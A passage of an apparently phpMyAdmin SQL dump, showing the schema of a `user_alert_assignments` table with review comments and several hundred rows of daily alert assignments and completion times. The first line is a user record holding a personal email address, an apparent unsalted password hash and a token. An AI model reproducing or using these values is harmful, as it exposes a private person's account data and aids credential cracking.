(308, NULL, 'Film', 'khussein112@gmail.com', 'cf95c27f74a086b8e8a22c6fa87b11e1', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-16 04:42:39', 'khussein112c10ef0', 'andRun', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-16 01:42:39', NULL, 1, 0, NULL, '4aae8c008d39ead7363b0884e63dcea706bc4ee24720eacc4df0578fd751750a', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `user_alert_assignments`
--

-- One row per alert handed to a user on a given calendar day; `completed`/`completed_at`
-- record when the user closed it. This statement declares columns only: no PRIMARY KEY,
-- no UNIQUE on (user_id, alert_id, assigned_date) and no FOREIGN KEY to the user/alert
-- tables appear here. phpMyAdmin dumps usually add keys in later ALTER TABLE statements
-- (not visible in this chunk) — confirm they exist before relying on the database to
-- reject orphaned or duplicate assignment rows, since `xp_earned` accounting depends on it.
CREATE TABLE `user_alert_assignments` (
  `id` int(11) NOT NULL,                  -- surrogate key; not declared PRIMARY KEY in this statement
  `user_id` int(11) NOT NULL,             -- assignee; presumably the user table's `id` — no FK declared here
  `alert_id` int(11) NOT NULL,            -- presumably `alerts`.`id` — no FK declared here
  `assigned_date` date NOT NULL,          -- day of assignment only (DATE: no time, no zone)
  `completed` tinyint(1) DEFAULT 0,       -- 0/1 flag, but nullable — TODO confirm the app never writes NULL
  `is_replay` tinyint(1) DEFAULT 0,       -- 0/1 flag; every row visible in this chunk is 0
  `xp_earned` int(11) DEFAULT 0,          -- every row visible in this chunk is 0 — confirm it is still written
  `completed_at` datetime DEFAULT NULL    -- naive DATETIME (no zone); NULL until completed
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_alert_assignments`
--

INSERT INTO `user_alert_assignments` (`id`, `user_id`, `alert_id`, `assigned_date`, `completed`, `is_replay`, `xp_earned`, `completed_at`) VALUES
(1, 34, 383, '2026-01-11', 0, 0, 0, NULL),
(2, 34, 398, '2026-01-11', 0, 0, 0, NULL),
(3, 34, 359, '2026-01-11', 0, 0, 0, NULL),
(4, 34, 375, '2026-01-11', 0, 0, 0, NULL),
(5, 34, 302, '2026-01-11', 0, 0, 0, NULL),
(6, 34, 599, '2026-01-11', 0, 0, 0, NULL),
(7, 34, 355, '2026-01-11', 0, 0, 0, NULL),
(8, 34, 345, '2026-01-11', 1, 0, 0, '2026-01-14 02:30:41'),
(9, 34, 596, '2026-01-11', 0, 0, 0, NULL),
(10, 34, 573, '2026-01-11', 0, 0, 0, NULL),
(11, 34, 640, '2026-01-11', 0, 0, 0, NULL),
(12, 34, 675, '2026-01-11', 1, 0, 0, '2026-02-13 04:56:20'),
(13, 34, 739, '2026-01-11', 0, 0, 0, NULL),
(14, 34, 673, '2026-01-11', 0, 0, 0, NULL),
(15, 34, 732, '2026-01-11', 1, 0, 0, '2026-01-14 02:29:02'),
(16, 34, 738, '2026-01-11', 0, 0, 0, NULL),
(17, 34, 669, '2026-01-11', 0, 0, 0, NULL),
(18, 34, 677, '2026-01-11', 0, 0, 0, NULL),
(19, 34, 758, '2026-01-11', 0, 0, 0, NULL),
(20, 34, 766, '2026-01-12', 1, 0, 0, '2026-01-23 06:27:53'),
(21, 34, 762, '2026-01-12', 1, 0, 0, '2026-02-13 04:56:20'),
(22, 34, 753, '2026-01-12', 1, 0, 0, '2026-02-13 04:56:20'),
(23, 34, 756, '2026-01-12', 0, 0, 0, NULL),
(24, 34, 745, '2026-01-12', 1, 0, 0, '2026-02-11 05:45:24'),
(25, 34, 655, '2026-01-12', 0, 0, 0, NULL),
(26, 34, 228, '2026-01-12', 0, 0, 0, NULL),
(27, 34, 230, '2026-01-12', 0, 0, 0, NULL),
(33, 34, 718, '2026-01-12', 0, 0, 0, NULL),
(34, 34, 602, '2026-01-12', 0, 0, 0, NULL),
(36, 74, 626, '2026-01-12', 0, 0, 0, NULL),
(37, 74, 636, '2026-01-12', 0, 0, 0, NULL),
(38, 74, 283, '2026-01-12', 0, 0, 0, NULL),
(39, 74, 762, '2026-01-12', 0, 0, 0, NULL),
(40, 74, 633, '2026-01-12', 0, 0, 0, NULL),
(41, 74, 635, '2026-01-12', 0, 0, 0, NULL),
(42, 74, 234, '2026-01-12', 0, 0, 0, NULL),
(43, 74, 282, '2026-01-12', 0, 0, 0, NULL),
(44, 74, 251, '2026-01-12', 0, 0, 0, NULL),
(45, 74, 231, '2026-01-12', 0, 0, 0, NULL),
(46, 76, 689, '2026-01-13', 0, 0, 0, NULL),
(47, 76, 690, '2026-01-13', 0, 0, 0, NULL),
(48, 76, 245, '2026-01-13', 0, 0, 0, NULL),
(49, 76, 707, '2026-01-13', 0, 0, 0, NULL),
(50, 76, 236, '2026-01-13', 0, 0, 0, NULL),
(51, 76, 709, '2026-01-13', 0, 0, 0, NULL),
(52, 76, 602, '2026-01-13', 0, 0, 0, NULL),
(53, 76, 225, '2026-01-13', 0, 0, 0, NULL),
(54, 76, 629, '2026-01-13', 0, 0, 0, NULL),
(55, 76, 284, '2026-01-13', 0, 0, 0, NULL),
(56, 34, 756, '2026-01-13', 0, 0, 0, NULL),
(57, 34, 762, '2026-01-13', 1, 0, 0, '2026-02-13 04:56:20'),
(58, 34, 766, '2026-01-13', 1, 0, 0, '2026-01-23 06:27:53'),
(59, 34, 745, '2026-01-13', 1, 0, 0, '2026-02-11 05:45:24'),
(60, 34, 753, '2026-01-13', 1, 0, 0, '2026-02-13 04:56:20'),
(61, 34, 694, '2026-01-13', 0, 0, 0, NULL),
(62, 34, 668, '2026-01-13', 0, 0, 0, NULL),
(63, 34, 230, '2026-01-13', 0, 0, 0, NULL),
(69, 34, 252, '2026-01-13', 1, 0, 0, '2026-02-13 04:56:20'),
(70, 34, 735, '2026-01-13', 0, 0, 0, NULL),
(72, 34, 766, '2026-01-14', 1, 0, 0, '2026-01-23 06:27:53'),
(73, 34, 745, '2026-01-14', 1, 0, 0, '2026-02-11 05:45:24'),
(74, 34, 753, '2026-01-14', 1, 0, 0, '2026-02-13 04:56:20'),
(75, 34, 762, '2026-01-14', 1, 0, 0, '2026-02-13 04:56:20'),
(76, 34, 219, '2026-01-14', 0, 0, 0, NULL),
(77, 34, 676, '2026-01-14', 0, 0, 0, NULL),
(78, 34, 230, '2026-01-14', 0, 0, 0, NULL),
(79, 78, 220, '2026-01-14', 1, 0, 0, '2026-01-16 04:29:01'),
(80, 78, 628, '2026-01-14', 1, 0, 0, '2026-01-16 04:31:24'),
(81, 78, 624, '2026-01-14', 0, 0, 0, NULL),
(82, 78, 259, '2026-01-14', 0, 0, 0, NULL),
(83, 78, 623, '2026-01-14', 1, 0, 0, '2026-01-14 17:39:31'),
(84, 78, 710, '2026-01-14', 1, 0, 0, '2026-02-13 21:56:41'),
(85, 78, 622, '2026-01-14', 1, 0, 0, '2026-01-16 04:29:28'),
(86, 78, 248, '2026-01-14', 0, 0, 0, NULL),
(87, 78, 688, '2026-01-14', 1, 0, 0, '2026-01-16 04:32:09'),
(88, 78, 229, '2026-01-14', 0, 0, 0, NULL),
(89, 74, 646, '2026-01-14', 0, 0, 0, NULL),
(90, 74, 761, '2026-01-14', 0, 0, 0, NULL),
(91, 74, 693, '2026-01-14', 0, 0, 0, NULL),
(92, 74, 642, '2026-01-14', 0, 0, 0, NULL),
(93, 74, 251, '2026-01-14', 0, 0, 0, NULL),
(94, 74, 225, '2026-01-14', 0, 0, 0, NULL),
(95, 74, 624, '2026-01-14', 0, 0, 0, NULL),
(96, 74, 757, '2026-01-14', 0, 0, 0, NULL),
(97, 74, 601, '2026-01-14', 0, 0, 0, NULL),
(98, 74, 623, '2026-01-14', 0, 0, 0, NULL),
(99, 77, 246, '2026-01-14', 1, 0, 0, '2026-01-15 09:37:53'),
(100, 77, 708, '2026-01-14', 1, 0, 0, '2026-01-14 15:18:53'),
(101, 77, 303, '2026-01-14', 1, 0, 0, '2026-01-14 15:20:02'),
(102, 77, 762, '2026-01-14', 0, 0, 0, NULL),
(103, 77, 627, '2026-01-14', 1, 0, 0, '2026-01-14 15:22:07'),
(104, 77, 314, '2026-01-14', 0, 0, 0, NULL),
(105, 77, 231, '2026-01-14', 1, 0, 0, '2026-01-15 09:34:10'),
(106, 77, 245, '2026-01-14', 1, 0, 0, '2026-01-15 09:36:29'),
(107, 77, 727, '2026-01-14', 0, 0, 0, NULL),
(108, 77, 228, '2026-01-14', 1, 0, 0, '2026-01-15 09:37:29'),
(109, 79, 604, '2026-01-15', 1, 0, 0, '2026-01-17 16:05:04'),
(110, 79, 633, '2026-01-15', 1, 0, 0, '2026-01-18 16:28:14'),
(111, 79, 690, '2026-01-15', 1, 0, 0, '2026-01-17 16:05:37'),
(112, 79, 317, '2026-01-15', 1, 0, 0, '2026-01-16 07:12:23'),
(113, 79, 225, '2026-01-15', 1, 0, 0, '2026-01-16 07:03:24'),
(114, 79, 251, '2026-01-15', 1, 0, 0, '2026-01-16 02:10:07'),
(115, 79, 689, '2026-01-15', 1, 0, 0, '2026-01-17 05:26:39'),
(116, 79, 237, '2026-01-15', 1, 0, 0, '2026-01-16 07:07:30'),
(117, 79, 284, '2026-01-15', 1, 0, 0, '2026-01-16 02:09:04'),
(118, 79, 273, '2026-01-15', 1, 0, 0, '2026-01-16 07:08:06'),
(119, 79, 730, '2026-01-16', 1, 0, 0, '2026-01-16 15:51:51'),
(120, 79, 317, '2026-01-16', 1, 0, 0, '2026-01-16 07:12:23'),
(121, 79, 602, '2026-01-16', 1, 0, 0, '2026-01-16 07:03:47'),
(122, 79, 314, '2026-01-16', 1, 0, 0, '2026-01-16 15:49:09'),
(123, 79, 223, '2026-01-16', 1, 0, 0, '2026-01-16 07:08:44'),
(124, 79, 634, '2026-01-16', 1, 0, 0, '2026-01-16 07:02:39'),
(125, 79, 248, '2026-01-16', 1, 0, 0, '2026-01-19 08:05:05'),
(126, 79, 631, '2026-01-16', 1, 0, 0, '2026-01-16 15:52:05'),
(127, 79, 603, '2026-01-16', 1, 0, 0, '2026-01-16 07:11:09'),
(128, 79, 235, '2026-01-16', 1, 0, 0, '2026-01-18 16:32:08'),
(129, 1, 729, '2026-01-16', 0, 0, 0, NULL),
(130, 1, 758, '2026-01-16', 0, 0, 0, NULL),
(131, 1, 229, '2026-01-16', 0, 0, 0, NULL),
(132, 1, 839, '2026-01-16', 0, 0, 0, NULL),
(133, 1, 687, '2026-01-16', 0, 0, 0, NULL),
(134, 1, 728, '2026-01-16', 0, 0, 0, NULL),
(135, 1, 234, '2026-01-16', 0, 0, 0, NULL),
(136, 1, 629, '2026-01-16', 0, 0, 0, NULL),
(137, 1, 844, '2026-01-16', 0, 0, 0, NULL),
(138, 1, 625, '2026-01-16', 0, 0, 0, NULL),
(139, 85, 727, '2026-01-16', 0, 0, 0, NULL),
(140, 85, 958, '2026-01-16', 0, 0, 0, NULL),
(141, 85, 222, '2026-01-16', 0, 0, 0, NULL),
(142, 85, 227, '2026-01-16', 0, 0, 0, NULL),
(143, 85, 952, '2026-01-16', 1, 0, 0, '2026-01-16 16:36:21'),
(144, 85, 302, '2026-01-16', 0, 0, 0, NULL),
(145, 85, 234, '2026-01-16', 0, 0, 0, NULL),
(146, 85, 689, '2026-01-16', 0, 0, 0, NULL),
(147, 85, 759, '2026-01-16', 0, 0, 0, NULL),
(148, 85, 729, '2026-01-16', 0, 0, 0, NULL),
(149, 86, 759, '2026-01-16', 0, 0, 0, NULL),
(150, 86, 762, '2026-01-16', 0, 0, 0, NULL),
(151, 86, 951, '2026-01-16', 0, 0, 0, NULL),
(152, 86, 227, '2026-01-16', 0, 0, 0, NULL),
(153, 86, 218, '2026-01-16', 0, 0, 0, NULL),
(154, 86, 283, '2026-01-16', 0, 0, 0, NULL),
(155, 86, 958, '2026-01-16', 0, 0, 0, NULL),
(156, 86, 254, '2026-01-16', 1, 0, 0, '2026-01-16 21:39:14'),
(157, 86, 710, '2026-01-16', 0, 0, 0, NULL),
(158, 86, 216, '2026-01-16', 0, 0, 0, NULL),
(159, 54, 951, '2026-01-17', 0, 0, 0, NULL),
(160, 54, 957, '2026-01-17', 0, 0, 0, NULL),
(161, 54, 687, '2026-01-17', 0, 0, 0, NULL),
(162, 54, 230, '2026-01-17', 0, 0, 0, NULL),
(163, 54, 958, '2026-01-17', 0, 0, 0, NULL),
(164, 54, 953, '2026-01-17', 0, 0, 0, NULL),
(165, 54, 218, '2026-01-17', 0, 0, 0, NULL),
(166, 54, 690, '2026-01-17', 0, 0, 0, NULL),
(167, 54, 959, '2026-01-17', 0, 0, 0, NULL),
(168, 54, 248, '2026-01-17', 0, 0, 0, NULL),
(169, 74, 950, '2026-01-17', 1, 0, 0, '2026-01-17 11:45:12'),
(170, 74, 945, '2026-01-17', 0, 0, 0, NULL),
(171, 74, 852, '2026-01-17', 0, 0, 0, NULL),
(172, 74, 940, '2026-01-17', 0, 0, 0, NULL),
(173, 74, 946, '2026-01-17', 0, 0, 0, NULL),
(174, 74, 955, '2026-01-17', 0, 0, 0, NULL),
(175, 74, 947, '2026-01-17', 0, 0, 0, NULL),
(176, 74, 621, '2026-01-17', 0, 0, 0, NULL),
(177, 74, 953, '2026-01-17', 0, 0, 0, NULL),
(178, 74, 711, '2026-01-17', 0, 0, 0, NULL),
(179, 1, 698, '2026-01-17', 0, 0, 0, NULL),
(180, 1, 637, '2026-01-17', 0, 0, 0, NULL),
(181, 1, 837, '2026-01-17', 1, 0, 0, '2026-01-21 06:12:48'),
(182, 1, 767, '2026-01-17', 0, 0, 0, NULL),
(183, 1, 663, '2026-01-17', 0, 0, 0, NULL),
(184, 1, 609, '2026-01-17', 0, 0, 0, NULL),
(185, 1, 649, '2026-01-17', 0, 0, 0, NULL),
(186, 1, 666, '2026-01-17', 0, 0, 0, NULL),
(187, 1, 660, '2026-01-17', 0, 0, 0, NULL),
(188, 1, 763, '2026-01-17', 0, 0, 0, NULL),
(189, 34, 852, '2026-01-18', 1, 0, 0, '2026-01-22 15:42:34'),
(190, 34, 945, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(191, 34, 959, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(192, 34, 766, '2026-01-18', 1, 0, 0, '2026-01-23 06:27:53'),
(193, 34, 944, '2026-01-18', 1, 0, 0, '2026-01-22 06:15:09'),
(194, 34, 955, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(195, 34, 762, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(196, 34, 1027, '2026-01-18', 0, 0, 0, NULL),
(197, 34, 652, '2026-01-18', 0, 0, 0, NULL),
(198, 34, 946, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(199, 52, 625, '2026-01-19', 0, 0, 0, NULL),
(200, 52, 239, '2026-01-19', 0, 0, 0, NULL),
(201, 52, 710, '2026-01-19', 0, 0, 0, NULL),
(202, 52, 632, '2026-01-19', 0, 0, 0, NULL),
(203, 52, 222, '2026-01-19', 0, 0, 0, NULL),
(204, 52, 707, '2026-01-19', 1, 0, 0, '2026-01-19 11:52:46'),
(205, 52, 234, '2026-01-19', 0, 0, 0, NULL),
(206, 52, 955, '2026-01-19', 0, 0, 0, NULL),
(207, 52, 218, '2026-01-19', 0, 0, 0, NULL),
(208, 52, 629, '2026-01-19', 0, 0, 0, NULL),
(209, 54, 948, '2026-01-19', 0, 0, 0, NULL),
(210, 54, 218, '2026-01-19', 0, 0, 0, NULL),
(211, 54, 953, '2026-01-19', 0, 0, 0, NULL),
(212, 54, 762, '2026-01-19', 0, 0, 0, NULL),
(213, 54, 226, '2026-01-19', 0, 0, 0, NULL),
(214, 54, 224, '2026-01-19', 0, 0, 0, NULL),
(215, 54, 951, '2026-01-19', 0, 0, 0, NULL),
(216, 54, 761, '2026-01-19', 0, 0, 0, NULL),
(217, 54, 227, '2026-01-19', 0, 0, 0, NULL),
(218, 54, 222, '2026-01-19', 0, 0, 0, NULL),
(219, 91, 951, '2026-01-20', 0, 0, 0, NULL),
(220, 91, 227, '2026-01-20', 0, 0, 0, NULL),
(221, 91, 959, '2026-01-20', 0, 0, 0, NULL),
(222, 91, 226, '2026-01-20', 0, 0, 0, NULL),
(223, 91, 948, '2026-01-20', 0, 0, 0, NULL),
(224, 91, 957, '2026-01-20', 0, 0, 0, NULL),
(225, 91, 760, '2026-01-20', 0, 0, 0, NULL),
(226, 91, 687, '2026-01-20', 0, 0, 0, NULL),
(227, 91, 956, '2026-01-20', 0, 0, 0, NULL),
(228, 91, 630, '2026-01-20', 0, 0, 0, NULL),
(229, 93, 229, '2026-01-20', 0, 0, 0, NULL),
(230, 93, 629, '2026-01-20', 0, 0, 0, NULL),
(231, 93, 227, '2026-01-20', 0, 0, 0, NULL),
(232, 93, 253, '2026-01-20', 0, 0, 0, NULL),
(233, 93, 624, '2026-01-20', 0, 0, 0, NULL),
(234, 93, 283, '2026-01-20', 1, 0, 0, '2026-01-21 00:08:02'),
(235, 93, 728, '2026-01-20', 1, 0, 0, '2026-01-21 00:01:30'),
(236, 93, 948, '2026-01-20', 1, 0, 0, '2026-01-21 00:13:10'),
(237, 93, 632, '2026-01-20', 0, 0, 0, NULL),
(238, 93, 238, '2026-01-20', 0, 0, 0, NULL),
(239, 94, 953, '2026-01-21', 0, 0, 0, NULL),
(240, 94, 302, '2026-01-21', 0, 0, 0, NULL),
(241, 94, 954, '2026-01-21', 0, 0, 0, NULL),
(242, 94, 710, '2026-01-21', 0, 0, 0, NULL),
(243, 94, 222, '2026-01-21', 0, 0, 0, NULL),
(244, 94, 218, '2026-01-21', 0, 0, 0, NULL),
(245, 94, 226, '2026-01-21', 0, 0, 0, NULL),
(246, 94, 230, '2026-01-21', 0, 0, 0, NULL),
(247, 94, 253, '2026-01-21', 0, 0, 0, NULL),
(248, 94, 238, '2026-01-21', 0, 0, 0, NULL),
(249, 95, 259, '2026-01-21', 0, 0, 0, NULL),
(250, 95, 760, '2026-01-21', 0, 0, 0, NULL),
(251, 95, 955, '2026-01-21', 0, 0, 0, NULL),
(252, 95, 762, '2026-01-21', 0, 0, 0, NULL),
(253, 95, 238, '2026-01-21', 0, 0, 0, NULL),
(254, 95, 230, '2026-01-21', 0, 0, 0, NULL),
(255, 95, 625, '2026-01-21', 1, 0, 0, '2026-01-21 21:44:05'),
(256, 95, 227, '2026-01-21', 1, 0, 0, '2026-01-21 21:51:26'),
(257, 95, 761, '2026-01-21', 1, 0, 0, '2026-01-21 21:41:12'),
(258, 95, 729, '2026-01-21', 0, 0, 0, NULL),
(259, 34, 955, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(260, 34, 959, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(261, 34, 946, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(262, 34, 945, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(263, 34, 766, '2026-01-21', 1, 0, 0, '2026-01-23 06:27:53'),
(264, 34, 956, '2026-01-21', 0, 0, 0, NULL),
(265, 34, 753, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(266, 34, 713, '2026-01-21', 0, 0, 0, NULL),
(267, 34, 953, '2026-01-21', 0, 0, 0, NULL),
(268, 34, 944, '2026-01-21', 1, 0, 0, '2026-01-22 06:15:09'),
(269, 34, 940, '2026-01-22', 1, 0, 0, '2026-01-22 05:32:40'),
(270, 34, 944, '2026-01-22', 1, 0, 0, '2026-01-22 06:15:09'),
(271, 34, 1035, '2026-01-22', 0, 0, 0, NULL),
(272, 34, 852, '2026-01-22', 1, 0, 0, '2026-01-22 15:42:34'),
(273, 34, 753, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(274, 34, 840, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(275, 34, 1038, '2026-01-22', 1, 0, 0, '2026-01-22 05:21:44'),
(276, 34, 744, '2026-01-22', 1, 0, 0, '2026-01-22 05:58:26'),
(277, 34, 607, '2026-01-22', 1, 0, 0, '2026-01-22 06:12:00'),
(278, 34, 1037, '2026-01-22', 0, 0, 0, NULL),
(279, 96, 621, '2026-01-22', 1, 0, 0, '2026-01-22 07:16:29'),
(280, 96, 238, '2026-01-22', 0, 0, 0, NULL),
(281, 96, 959, '2026-01-22', 0, 0, 0, NULL),
(282, 96, 302, '2026-01-22', 0, 0, 0, NULL),
(283, 96, 709, '2026-01-22', 0, 0, 0, NULL),
(284, 96, 219, '2026-01-22', 0, 0, 0, NULL),
(285, 96, 226, '2026-01-22', 0, 0, 0, NULL),
(286, 96, 229, '2026-01-22', 0, 0, 0, NULL),
(287, 96, 729, '2026-01-22', 0, 0, 0, NULL),
(288, 96, 253, '2026-01-22', 0, 0, 0, NULL),
(290, 34, 946, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(291, 34, 745, '2026-01-22', 1, 0, 0, '2026-02-11 05:45:24'),
(292, 34, 945, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(294, 34, 956, '2026-01-22', 0, 0, 0, NULL),
(295, 34, 959, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(296, 34, 954, '2026-01-22', 0, 0, 0, NULL),
(297, 34, 755, '2026-01-22', 0, 0, 0, NULL),
(298, 34, 230, '2026-01-22', 0, 0, 0, NULL),
(299, 34, 959, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(300, 34, 955, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(301, 34, 766, '2026-01-23', 1, 0, 0, '2026-01-23 06:27:53'),
(302, 34, 947, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(303, 34, 753, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(304, 34, 946, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(305, 34, 945, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(306, 34, 665, '2026-01-23', 1, 0, 0, '2026-01-23 06:26:44'),
(307, 34, 845, '2026-01-23', 1, 0, 0, '2026-01-25 21:10:44'),
(308, 34, 956, '2026-01-23', 0, 0, 0, NULL),
(309, 79, 748, '2026-01-23', 1, 0, 0, '2026-01-24 15:33:54'),
(310, 79, 957, '2026-01-23', 0, 0, 0, NULL),
(311, 79, 936, '2026-01-23', 0, 0, 0, NULL),
(312, 79, 759, '2026-01-23', 1, 0, 0, '2026-01-23 07:16:24'),
(313, 79, 1031, '2026-01-23', 1, 0, 0, '2026-01-23 07:16:43'),
(314, 79, 219, '2026-01-23', 0, 0, 0, NULL),
(315, 79, 222, '2026-01-23', 1, 0, 0, '2026-01-24 15:35:43'),
(316, 79, 259, '2026-01-23', 1, 0, 0, '2026-01-24 15:37:24'),
(317, 79, 218, '2026-01-23', 1, 0, 0, '2026-01-24 15:37:47'),
(318, 79, 639, '2026-01-23', 1, 0, 0, '2026-02-02 15:11:45'),
(319, 56, 253, '2026-01-23', 0, 0, 0, NULL),
(320, 56, 252, '2026-01-23', 0, 0, 0, NULL),
(321, 56, 230, '2026-01-23', 0, 0, 0, NULL),
(322, 56, 951, '2026-01-23', 0, 0, 0, NULL),
(323, 56, 632, '2026-01-23', 0, 0, 0, NULL),
(324, 56, 956, '2026-01-23', 0, 0, 0, NULL),
(325, 56, 224, '2026-01-23', 0, 0, 0, NULL),
(326, 56, 710, '2026-01-23', 0, 0, 0, NULL),
(327, 56, 219, '2026-01-23', 0, 0, 0, NULL),
(328, 56, 624, '2026-01-23', 0, 0, 0, NULL),
(329, 42, 939, '2026-01-23', 0, 0, 0, NULL),
(330, 42, 954, '2026-01-23', 0, 0, 0, NULL),
(331, 42, 836, '2026-01-23', 0, 0, 0, NULL),
(332, 42, 753, '2026-01-23', 0, 0, 0, NULL),
(333, 42, 947, '2026-01-23', 0, 0, 0, NULL),
(334, 42, 736, '2026-01-23', 0, 0, 0, NULL),
(335, 42, 714, '2026-01-23', 0, 0, 0, NULL),
(336, 42, 702, '2026-01-23', 0, 0, 0, NULL),
(337, 42, 605, '2026-01-23', 0, 0, 0, NULL),
(338, 42, 613, '2026-01-23', 0, 0, 0, NULL),
(339, 94, 710, '2026-01-23', 0, 0, 0, NULL),
(340, 94, 956, '2026-01-23', 0, 0, 0, NULL),
(341, 94, 253, '2026-01-23', 0, 0, 0, NULL),
(342, 94, 218, '2026-01-23', 0, 0, 0, NULL),
(343, 94, 630, '2026-01-23', 0, 0, 0, NULL),
(344, 94, 949, '2026-01-23', 0, 0, 0, NULL),
(345, 94, 951, '2026-01-23', 0, 0, 0, NULL),
(346, 94, 219, '2026-01-23', 0, 0, 0, NULL),
(347, 94, 632, '2026-01-23', 0, 0, 0, NULL),
(348, 94, 259, '2026-01-23', 0, 0, 0, NULL),
(349, 34, 753, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(350, 34, 945, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(351, 34, 947, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(352, 34, 946, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(353, 34, 840, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(354, 34, 745, '2026-01-24', 1, 0, 0, '2026-02-11 05:45:24'),
(355, 34, 959, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(356, 34, 1026, '2026-01-24', 0, 0, 0, NULL),
(357, 34, 748, '2026-01-24', 0, 0, 0, NULL),
(358, 34, 956, '2026-01-24', 0, 0, 0, NULL),
(359, 79, 680, '2026-01-24', 0, 0, 0, NULL),
(360, 79, 695, '2026-01-24', 1, 0, 0, '2026-01-24 15:35:04'),
(361, 79, 609, '2026-01-24', 0, 0, 0, NULL),
(362, 79, 735, '2026-01-24', 0, 0, 0, NULL),
(363, 79, 731, '2026-01-24', 0, 0, 0, NULL),
(364, 79, 692, '2026-01-24', 0, 0, 0, NULL),
(365, 79, 746, '2026-01-24', 0, 0, 0, NULL),
(366, 79, 624, '2026-01-24', 0, 0, 0, NULL),
(367, 79, 853, '2026-01-24', 1, 0, 0, '2026-01-24 15:35:20'),
(368, 79, 694, '2026-01-24', 0, 0, 0, NULL),
(369, 1, 649, '2026-01-24', 0, 0, 0, NULL),
(370, 1, 717, '2026-01-24', 0, 0, 0, NULL),
(371, 1, 699, '2026-01-24', 0, 0, 0, NULL),
(372, 1, 763, '2026-01-24', 0, 0, 0, NULL),
(373, 1, 841, '2026-01-24', 0, 0, 0, NULL),
(374, 1, 230, '2026-01-24', 0, 0, 0, NULL),
(375, 1, 941, '2026-01-24', 0, 0, 0, NULL),
(376, 1, 738, '2026-01-24', 0, 0, 0, NULL),
(377, 1, 754, '2026-01-24', 0, 0, 0, NULL),
(378, 1, 721, '2026-01-24', 0, 0, 0, NULL),
(379, 34, 762, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(380, 34, 955, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(381, 34, 745, '2026-01-25', 1, 0, 0, '2026-02-11 05:45:24'),
(382, 34, 959, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(383, 34, 753, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(384, 34, 956, '2026-01-25', 0, 0, 0, NULL),
(385, 34, 946, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(386, 34, 750, '2026-01-25', 0, 0, 0, NULL),
(387, 34, 660, '2026-01-25', 0, 0, 0, NULL),
(388, 34, 840, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(389, 1, 252, '2026-01-25', 0, 0, 0, NULL),
(390, 1, 646, '2026-01-25', 0, 0, 0, NULL),
(391, 1, 674, '2026-01-25', 0, 0, 0, NULL),
(392, 1, 234, '2026-01-25', 0, 0, 0, NULL),
(393, 1, 302, '2026-01-25', 0, 0, 0, NULL),
(394, 1, 768, '2026-01-25', 0, 0, 0, NULL),
(395, 1, 942, '2026-01-25', 0, 0, 0, NULL),
(396, 1, 666, '2026-01-25', 0, 0, 0, NULL),
(397, 1, 947, '2026-01-25', 0, 0, 0, NULL),
(398, 1, 700, '2026-01-25', 0, 0, 0, NULL),
(399, 97, 636, '2026-01-25', 0, 0, 0, NULL),
(400, 97, 949, '2026-01-25', 0, 0, 0, NULL),
(401, 97, 958, '2026-01-25', 0, 0, 0, NULL),
(402, 97, 957, '2026-01-25', 0, 0, 0, NULL),
(403, 97, 234, '2026-01-25', 0, 0, 0, NULL),
(404, 97, 687, '2026-01-25', 0, 0, 0, NULL),
(405, 97, 951, '2026-01-25', 0, 0, 0, NULL),
(406, 97, 219, '2026-01-25', 0, 0, 0, NULL),
(407, 97, 630, '2026-01-25', 0, 0, 0, NULL),
(408, 97, 239, '2026-01-25', 0, 0, 0, NULL),
(409, 98, 238, '2026-01-25', 0, 0, 0, NULL),
(410, 98, 959, '2026-01-25', 0, 0, 0, NULL),
(411, 98, 219, '2026-01-25', 0, 0, 0, NULL),
(412, 98, 729, '2026-01-25', 0, 0, 0, NULL),
(413, 98, 951, '2026-01-25', 0, 0, 0, NULL),
(414, 98, 954, '2026-01-25', 0, 0, 0, NULL),
(415, 98, 282, '2026-01-25', 0, 0, 0, NULL),
(416, 98, 252, '2026-01-25', 0, 0, 0, NULL),
(417, 98, 234, '2026-01-25', 0, 0, 0, NULL),
(418, 98, 216, '2026-01-25', 0, 0, 0, NULL),
(419, 42, 687, '2026-01-25', 0, 0, 0, NULL),
(420, 42, 724, '2026-01-25', 0, 0, 0, NULL),
(421, 42, 614, '2026-01-25', 0, 0, 0, NULL),
